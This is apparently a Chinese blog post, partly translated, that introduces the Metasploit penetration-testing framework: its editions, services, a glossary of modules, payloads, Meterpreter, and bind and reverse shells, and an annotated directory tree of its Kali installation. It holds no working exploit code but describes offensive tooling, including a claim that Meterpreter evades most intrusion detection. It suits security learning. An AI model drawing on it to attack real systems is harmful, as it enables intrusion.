- 纯粹的翻译工作,确实没有必要,博主以后再也不作死去翻译了,大家都是成年人了,时间很宝贵的,科科。这篇文章很容易看懂的部分,就没翻译。不太容易理解,博主就用中文描述了一下。
关于Metasploit
Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. The platform includes the Metasploit Framework and its commercial counterparts: Metasploit Pro, Express, Community, and Nexpose Ultimate.
Metasploit框架
- 开源项目地址:https://github.com/rapid7/metasploit-framework/
- 项目wiki页面:https://github.com/rapid7/metasploit-framework/wiki
Metasploit Pro 和 其他商业版本
Most of the additional features are targeted towards automating and streamlining common pentest tasks, such as vulnerability validation, social engineering, custom payload generation, and bruteforce attacks.
Metasploit 组件
Modules 模块
Modules类型包括:exploit, auxiliary, payload, no operation payload (NOP), or post-exploitation
Services 服务
- PostgreSQL运行的数据库服务,用于存储MSF的项目数据
- Ruby on Rails运行web版的MSF接口
- Pro service, or the Metasploit service bootstraps Rails, the Metasploit Framework, and the Metasploit RPC server.
Web Interface
A web interface is available for you to work with Metasploit Pro. To launch the web interface, open a web browser and go to https://localhost:3790.
组件介绍
- Auxiliary module: 这个模块不执行payload(带有一定利用为目的的代码,攻击载体)。辅助模块包括扫描,模糊测试,拒绝服务攻击等功能(scanners, fuzzers, and denial of service attacks)
- Bind shell payload:A shell that attaches a listener on the exploited system and waits for a connection to the listener.
- Discovery scan: A discovery scan is a Metasploit scan that combines Nmap and several Metasploit modules to enumerate and fingerprint targets.
- Exploit:利用特定的漏洞,使攻击者进入目标系统的程序。For example, one of the most common exploits is MS08-067, which targets a Windows Server Service vulnerability that could allow remote code execution.
- Exploit module: an exploit creates a session. Exploit modules include buffer overflow, code injection, and web application exploits.
- Meterpreter:这个一个高级的多功能的payload,他提供给你一个shell接口。你可以利用这个Meterpreter shell接口,做很多事情,像是下载文件、获取账号的密码hash、跳向其他网络(跳板,pivot into other networks)。Meterpreter运行在内存中,所以他无法被大多数的入侵检测系统发觉。
- Payload:在成功得到目标机的权限后,一段执行在目标系统中的代码。这个payload中你可以定义怎么连接shell,你控制了目标机后想做哪些操作。payload可以是反弹shell或绑定shell的功能。这两个payload功能(反弹shell和绑定shell)的不同点是连接方向的不同,反弹shell是目标机主动连攻击者机器,绑定shell是攻击者机器去连接目标机。
- Post-exploitation module: 这个模块能够搜集更多信息,或是为得到系统更进一步的访问权限而获取信息。例如hash dumps、应用和服务的统计。
- shellcode:The set of instructions that an exploit uses as the payload. payload中的指令集。
MSF文件结构
root@kali:/usr/share/metasploit-framework# tree -L 2 --sort=version -r -d
.
├── vendor
│ └── bundle
├── tools #额外的小工具和第三方脚本工具
│ ├── recon
│ ├── password
│ ├── modules
│ ├── memdump
│ ├── hardware
│ ├── exploit
│ ├── dev
│ └── context
├── scripts #metasplit的常用后渗透模块,区别于data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行
│ ├── shell
│ ├── resource
│ ├── ps
│ └── meterpreter
├── plugins #metasploit的第三方插件接口
├── modules #metasploit系统工具模块
│ ├── post #后渗透模块
│ ├── payloads #攻击荷载模块
│ ├── nops #空字段模块
│ ├── exploits #渗透模块
│ ├── encoders #编码模块
│ └── auxiliary #辅助模块
├── lib #metasploit的一些基础类和第三方模块类
│ ├── telephony
│ ├── tasks
│ ├── sqlmap
│ ├── snmp
│ ├── rex
│ ├── rbmysql
│ ├── rabal
│ ├── postgres
│ ├── net
│ ├── msf
│ ├── metasploit
│ ├── metasm
│ └── anemone
├── documentation -> ../doc/metasploit-framework
├── db #rails编译生成msf的web框架时的数据库信息
│ └── migrate
├── data #后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息
│ ├── wordlists
│ ├── wmap
│ ├── webcam
│ ├── templates
│ ├── sounds
│ ├── snmp
│ ├── post
│ ├── php
│ ├── passivex
│ ├── msfcrawler
│ ├── meterpreter
│ ├── markdown_doc
│ ├── logos
│ ├── lab
│ ├── ipwn
│ ├── flash_detector
│ ├── exploits
│ ├── cpuinfo
│ └── SqlClrPayload
├── config #metasploit的环境配置信息,数据库配置信息
│ └── environments
└── app
├── validators
└── concerns
66 directories
root@kali:/usr/share/metasploit-framework# tree -L 1 --sort=version -r -p | grep '\[-'
├── [-rwxr-xr-x] ruby
├── [-rwxr-xr-x] msfvenom #集成了msfpayload和msfencode的功能,效率更高,即将替代msf payload和msfencode
├── [-rwxr-xr-x] msfupdate #metasploit更新模块,可以用来更新metasploit模块
├── [-rwxr-xr-x] msfrpcd #持久性的metasploit本地服务,可以给远程用户提供rpc服务以及其他的http服务,可以通过xml进行数据传输。
├── [-rwxr-xr-x] msfrpc #metasploit的服务端,非持久性的rpc服务
├── [-rwxr-xr-x] msfdb
├── [-rwxr-xr-x] msfd #metasploit服务,非持久性服务
├── [-rwxr-xr-x] msfconsole #metasploit的基本命令行,集成了各种功能。
├── [-rw-r--r--] metasploit-framework.gemspec
├── [-rwxr-xr-x] Rakefile
├── [-rw-r--r--] Gemfile.lock
└── [-rwxr-xr-x] Gemfile